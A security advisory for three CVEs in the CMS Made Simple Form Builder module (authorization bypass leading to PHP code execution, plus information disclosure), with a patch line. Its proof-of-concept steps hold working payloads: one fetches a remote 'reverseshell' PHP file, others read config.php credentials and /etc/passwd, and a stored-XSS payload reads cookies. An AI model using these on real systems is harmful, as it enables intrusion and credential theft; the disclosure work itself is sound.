Security Advisory
Title: CMS Made Simple Form Builder authorization bypass vulnerability
Class: Bypassing Authorization
CVE: CVE-2017-6070 CVE-2017-6071 CVE-2017-6072
Remote: Yes
Local: No
Published: Feb 17 2017 02:00 PM
Updated: Feb 18 2017 11:00 AM
Credit: Peter Arts ([email protected])
Vulnerable: CMS Made Simple Form Builder 0.6.4 (only 2 & 3)
CMS Made Simple Form Builder 0.7 (only 2 & 3)
CMS Made Simple Form Builder 0.7.1 (only 2 & 3)
CMS Made Simple Form Builder 0.7.2 (only 2 & 3)
CMS Made Simple 1.x Form Builder 0.7.3
CMS Made Simple 1.x Form Builder 0.7.4
CMS Made Simple 1.x Form Builder 0.8
CMS Made Simple 1.x Form Builder 0.8.1.1
CMS Made Simple 1.x Form Builder 0.8.1.2
CMS Made Simple 1.x Form Builder 0.8.1.3
CMS Made Simple 1.x Form Builder 0.8.1.4
About the module:
This is the next generation of Feedback Forms, which will include an API for modules to use, as well as a general structured data system. CMSMS 1.12.x and 2.x compatible.
Latest Release: 0.8.1.6, 2017-02-17
Project link: http://dev.cmsmadesimple.org/projects/formbuilder
Information:
The CMS Made Simple Form Builder module is prone to multiple vulnerabilities that lets remote attackers execute arbitrary code and perform stored XSS attacks because the module fails to check permissions in several admin pages. An attacker may leverage this issue to execute arbitrary PHP code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access and can be exploited by malicious people to compromise a vulnerable system.
These problems exists in both CMS Made Simple version 1 and 2, but code execution seems to be possible in version 1 only (and depending on Smarty configuration).
Affected versions:
0.7.3 through 0.8.1.5
0.6.4 through 0.8.1.5 (vulnerability 2 & 3)
CVE-2017-6070: Vulnerability 1 (POC):
CMS Made Simple version 1.x Form Builder before version 0.8.1.6 allows remote attackers to execute PHP code via the cntnt01fbrp_forma_form_template parameter in admin_store_form.
Attackers may exploit this issue through a browser. Steps:
1. Open URL:
http://host/index.php?mact=FormBuilder,cntnt01,admin_store_form,0&cntnt01showtemplate=false&cntnt01form_id=[FORM_ID]
Grab form_id from hidden input field “cntnt01form_id” in HTML-source of a published webform on target website or enumerate starting 1.
2. Replace contents of the “Template to use to Display Form” (“cntnt01fbrp_forma_form_template”) input field with PHP code wrapped in Smarty PHP tags:
{php}
phpinfo();
{/php}
Limitations: cannot use ', ", $, <, >, and several other special characters as these are being escaped or removed by CMS Made Simple input sanitizer. Therefore, for example PHP string open/close characters (‘/”) cannot be used and one is limited to a subset of characters to prevent PHP parser errors.
This can be circumvented by downloading remote PHP source file using “include()” or “file_get_contents()” and saving the contents to a permanent location:
echo file_put_contents(reverseshell.chr(46).php, file_get_contents([DOWNLOAD_URL]));
If allow_url_fopen is disabled, curl can be used instead.
If PHP tags are disabled in Smarty configuration, “eval” can be used instead (see next section).
3. Invoke PHP code by requesting the website page the form has been published on or via:
http://host/index.php?mact=FormBuilder,cntnt01,default,0&cntnt01showtemplate=false&cntnt01form_id=[FORM_ID]
Print CMS Made Simple configuration file, containing database login credentials, output is on the published page:
{php} echo file_get_contents(config.chr(46).php); {/php}
Print /etc/passwd:
{php} echo file_get_contents(DIRECTORY_SEPARATOR.etc.DIRECTORY_SEPARATOR.passwd); {/php}
Stored XSS example using “eval”:
{eval chr(60)}SCRIPT{eval chr(62)}alert(document.cookie){eval chr(60)}{eval chr(47)}SCRIPT{eval chr(62)}
CVE-2017-6071: Vulnerability 2 (POC):
CMS Made Simple version 1.x Form Builder before version 0.8.1.6 allows remote attackers to conduct information-disclosure attacks via exportxml.
Attackers may exploit this issue through a browser.
http://host/index.php?mact=FormBuilder,cntnt01,exportxml,0&cntnt01showtemplate=false&cntnt01form_id=[FORM_ID]
Grab form_id from hidden input field “cntnt01form_id” in HTML source of a published webform on target website or enumerate starting 1.
Form properties can disclose email addresses.
CVE-2017-6072: Vulnerability 3 (POC):
CMS Made Simple version 1.x Form Builder before version 0.8.1.6 allows remote attackers to conduct information-disclosure attacks via defaultadmin.
Attackers may exploit this issue through a browser.
http://host/index.php?mact=FormBuilder,cntnt01,defaultadmin,0&cntnt01showtemplate=false
Website forms are being disclosed and XML upload form is visible (contents not being processed).
Solution:
Add the following line of code to the affected PHP files (action.admin_store_form.php, action.defaultadmin.php, action.exportxml.php):
if (! $this->CheckAccess()) exit;
Please update to version 0.8.1.6. as soon as possible (fixed version).